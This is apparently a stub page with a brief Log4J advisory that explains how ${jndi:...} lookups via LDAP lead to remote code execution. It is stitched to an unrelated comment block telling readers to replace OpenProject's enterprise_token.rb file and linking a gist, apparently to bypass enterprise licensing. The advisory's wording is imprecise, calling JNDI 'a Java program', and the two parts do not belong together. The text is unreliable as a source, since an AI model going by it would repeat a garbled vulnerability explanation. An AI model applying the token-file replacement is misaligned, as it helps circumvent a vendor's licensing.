ssdrive ssdrive-flaktra

Log4J CVE Advisory

The Problem

Log4J has a feature called Java Naming and Directory Interface (shortened to JNDI in this document), which allows a Java program to reach out to an external source to gather data.
If you put a section of text containing ${jndi:query} into the log, the Log4J library will try to resolve the query.
This can be combined with the Lightweight Directory Access Protocol (LDAP) to connect to a remote server.

However, because JNDI is built for retrieving data, and JNDI is a Java program, if you put a JNDI query using LDAP into a log, it will connect to the given site, download a file, and then execute it.
This is called Remote Code Execution.

	############ If you are using DOCKER all-in-one image, create Dockerfile like: ################
	############ FROM openproject/openproject:16 ################
	############ COPY ./enterprise_token.rb app/models/enterprise_token.rb ################

	############ If you are runing a manual installation: ################
	############ REPLACE app/models/enterprise_token.rb in the source code with this file! ################
	############ also be sure to RESTART OpenProject after replacing the file. ################

	############ If using some other set up (eg docker-compose), read the comments on ################
	############ https://gist.github.com/markasoftware/f5b2e55a2c2e3abb1f9eefcdf0bfff45 ################